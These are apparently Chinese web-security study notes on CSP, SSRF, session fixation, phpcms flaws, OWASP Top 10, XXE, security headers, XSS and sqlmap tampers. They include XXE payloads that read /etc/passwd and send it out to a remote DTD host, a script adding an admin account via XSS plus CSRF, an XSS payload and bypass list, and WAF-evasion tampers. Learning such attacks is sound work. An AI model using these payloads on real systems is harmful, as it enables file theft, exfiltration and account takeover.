一,解释什么是CSP
为了让web应用程序分出哪些脚本是被第三方注入的,哪些脚本是程序自身的
CSP定义了 Content-Security-Policy HTTP头
Content-Security-Policy:script-src 'self' https://apis.google.com
只允许执行自身和特定url中的脚本
content-src:限制连接的类型(例如XHR、WebSockets和EventSource)
font-src:控制网络字体的来源。例如可以通过font-src https://themes.googleusercontent.com来使用Google的网络字体。
frame-src:列出了可以嵌入的frame的来源。例如frame-src https://youtube.com只允许嵌入YouTube的视频。。
img-src:定义了可加载图像的来源。
media-src:限制视频和音频的来源。
object-src:限制Flash和其他插件的来源。
style-src:类似于Script-src,只是作用于css文件。
来源: http://www.jb51.net/html5/57164.html
但是现代浏览器已经通过前缀来提供了支持:Firefox使用x-Content-Security-Policy,WebKit使用X-WebKit-CSP。未来会逐步过渡到统一的标准。
“none”:你可能期望不匹配任何内容
“self”:与当前来源相同,但不包含子域
“unsafe-inline”:允许内联Javascript和CSS
“unsafe-eval”:允许文本到JS的机制例如eval
csp安全性检测 地址
https://csp-evaluator.withgoogle.com/
script-src 'strict-dynamic' 'nonce-rAnd0m123' 'unsafe-inline' http: https:;
object-src 'none';
base-uri 'none';
report-uri https://csp.example.com;
二,什么是SSRF漏洞
SSRF 服务端请求伪造
存在的位置 比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等
那么产生SSRF漏洞的环节在哪里呢?目标网站接受请求后在服务器端验证请求是否合法
1)分享:通过URL地址分享网页内容
2)转码服务
3)在线翻译
4)图片加载与下载:通过URL地址加载或下载图片
5)图片、文章收藏功能
6)未公开的api实现以及其他调用URL的功能
7)从URL关键字中寻找
PHP的常用实现
1)php file_get_contents:
2,php fsockopen():
3,php curl_exec():
读取本地文件
file:///C:/Windows/win.ini
探测内网应用
三,session fixation漏洞
用户登录前后的session_id没有变化则可能存在session fixation漏洞
攻击者X先获取到一个未经认证的session_id ,将其发给用户Y认证,用户认证后服务器没有更新session_id的值,所以X可以凭借此session直接登录用户的账号
四,phpcms两个漏洞
1)getshell
exp "info[content]": "
"
info[content] 为什么是content : content =》转到处理函数editor中
php的处理函数
preg_match_all("/(href|src)=(["|']?)([^ "'>]+.($ext))\2/i", $string, $matches)
这里正则要求输入满足src/href=url.(gif|jpg|jpeg|bmp|png),我们的 payload (
)符合这一格式(这也就是为什么后面要加.jpg的原因)。
接下来程序使用这行代码来去除 url 中的锚点:$remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref);,处理过后$remotefileurls的内容如下:
http://172.17.0.1:8082/shell.txt?.php#.jpg
http://172.17.0.1:8082/shell.txt?.php
可以看到#.jpg被删除了,正因如此,下面的$filename = fileext($file);取的的后缀变成了php,这也就是 PoC 中为什么要加#的原因:把前面为了满足正则而构造的.jpg过滤掉,使程序获得我们真正想要的php文件后缀。
来源: http://paper.seebug.org/273/
如何获取文件地址
在后续的数据库操作中因为没有content产生报错 返回插入数据库的返回路径。 在status>0的情况下
如果在status<0的情况下(用户名邮箱不合理) 另外在phpsso配置不好的情况下 不存在status
这时需要对文件名爆破 仅仅是时间加上三位随机数
2)wap SQL注入漏洞
phpcms/modules/attachment/attachments.php中的swfupload_json函数:
将src参数用safe_replace函数过滤
问题是只过滤了一次 %*27 ==》 %27
处理之后 程序使用json_encode和set_cookie 生成了一个加密的cookie
获取合法的加密值 利用wap模块 只要传入一个siteid就返回一个加密cookie
在phpcms/modules/content/down.php中
将传入的a_k 经过sys_auth 解密 然后使用parse_str() :以&分割符解析并注册变量
$id未初始化 将payload注入id 同时parse_str()可以进行url解码 将%27 变成单引号 带入查询
1,获取已存在的cookie,用于后期生成payload;
2,访问attachments模块中的swfupload_json方法生成payload,在访问的同时post提交刚才获取的cookie;
3,将生成的payload带入content模块中的down方法,最终成功执行SQL注入。
五,OWASP top10
A1 注入
A2 跨站脚本xss
A3 失效的身份认证和会话管理
A4 不安全的直接对象引用
A5 安全配置错误
A6 敏感信息泄露
A7 功能级访问缺失
A8 跨站请求伪造 (CSRF)
A9 含有已知漏洞的组件
A10 未验证的重定向和转发
六,XXE XML外部实体注入(XML External Entity)
https://security.tencent.com/index.php/blog/msg/69
当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
内部声明DTD
<!DOCTYPE 根元素 [元素声明]>
引用外部DTD
<!DOCTYPE 根元素 SYSTEM "文件名">
内部声明实体
<!ENTITY 实体名称 "实体的值">
引用外部实体
<!ENTITY 实体名称 SYSTEM "URI">
<?xml version="1.0">
<! DOCTYPE a[
<! ENTITY b SYSTEM "file:///etc/passwd">
]>
<c>&b;</c>
恶意引入外部实体
<?xml version="1.0">
<! DOCTYPE a[
<! ENTITY % d SYSTEM "http://ssss/evil.dtd">
%d;
]>
<c>&b;</c>
evil.dtd
<! ENTITY b SYSTEM "file:///etc/passwd">
payload链接
https://gist.githubusercontent.com/mikeknoop/e7b3c526738b66950eb4/raw/1d46d432ed380abc986cf15028221318b836395b/text.xml
攻击手法:1,如上文读取系统内文件
2,应对不输出的情况下,使用 (这里属于带外数据的手法,与之相关的还有ftp gopher,无效文件名报错 )
<! ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/issue">
<! ENTITY % dtd SYSTEM " http://192.168.1.109/evil.dtd">
在远程的evil.dtd中
<! ENTITY % all
"<!ENTITY % send SYSTEM 'http://192.168.1.122/?file;'>"
>
%all;
3,执行系统命令
<!ENTITY xxe SYSTEM "expect://id">
该CASE是在安装expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令。
4,ddos攻击 xml实体爆炸
file:///dev/random file:///dev/urandom file://c:/con/con file:///dev/zero
5,docx xxe
新建docx 用压缩软件打开 ,修改最外面的[Content_Types].xml 插入payload
上传到目标上 点击预览
6,
5,端口扫描
防御:1,
七,XSS结合CSRF添加用户
var http = new XMLHttpRequest();
var url = "http://192.168.1.190/admin/adminadd.php?admin=add";
http.open("post",url,true);
http.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
http.send("name=kaka&passwd=kaka&remark=kaka&mid=1&adminsubmit=%CC%E1%BD%BB");
http.onreadystatechange = function(){
if (http.readState==4 && http.status==200){
alert(sucess);
}
}
八,HTTP协议安全头部
1,X-Content-Type-Options
X-Content-Type-Options: nosniff
让浏览器不自己通过内容判断文件类型 严格按照content-type指定 减少MIME类型混淆
2,x-frame-options: SAMEORIGIN 防止点击劫持
这个响应头支持三种配置:
DENY:不允许被任何页面嵌入;
SAMEORIGIN:不允许被本域以外的页面嵌入;
ALLOW-FROM uri:不允许被指定的域名以外的页面嵌入(Chrome现阶段不支持);
3,HSTS 只能用https访问
strict-transport-security: max-age=16070400; includeSubDomains
九,XSSpayload整理
<script>alert(1)</script>
'"><script>alert(1)</script>
<img/src=@ onerror=alert(1)/>
'"><img/src=@ onerror=alert(1)/>
' onmouseover=alert(1) x='
" onmouseover=alert(1) x="
` onmouseover=alert(1) x=`
javascript:alert(1)//
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
'";alert(1)//
</script><script>alert(1)//
}x:expression(alert(1))
alert(1)//
*/-->'"></iframe></script></style></title></textarea></xmp></noscript></
noframes></plaintext><script>alert(1)</script>
常见的绕过姿势
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41) ==> alert(1)
hex编码
<script>alert("xss");</script> 可以转换为:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
<>== img src=1 onerror=alert(/xss/)u003e
<script>
var s = " u003e";
alert(s);
</script>
十,sqlamp的tamper
apostrophemask.py 用UTF-8全角字符替换单引号字符
apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
appendnullbyte.py 在payload末尾添加空字符编码
base64encode.py 对给定的payload全部字符使用Base64编码
between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
chardoubleencode.py 对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
charencode.py 对给定的payload全部字符使用URL编码(不处理已经编码的字符)
charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py 用“LIKE”运算符替换全部等于号“=”
greatest.py 用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py 用小写值替换每个关键字字符
modsecurityversioned.py 用注释包围完整的查询
modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
multiplespaces.py 在SQL关键字周围添加多个空格
nonrecursivereplacement.py 用representations替换预定义SQL关键字,适用于
过滤器
overlongutf8.py 转换给定的payload当中的所有字符
percentage.py 在每个字符之前添加一个百分号
randomcase.py 随机转换每个关键字字符的大小写
randomcomments.py 向SQL关键字中插入随机注释
securesphere.py 添加经过特殊构造的字符串
sp_password.py 向payload末尾添加“sp_password” for automatic
obfuscation from DBMS logs
space2comment.py 用“/**/”替换空格符
space2dash.py 用破折号注释符“–”其次是一个随机字符串和一个换行符替换空格符
space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py 用破折号注释符“–”其次是一个换行符替换空格符
space2plus.py 用加号“+”替换空格符
space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py 用MySQL注释包围每个非函数关键字
versionedmorekeywords.py 用MySQL注释包围每个关键字
xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF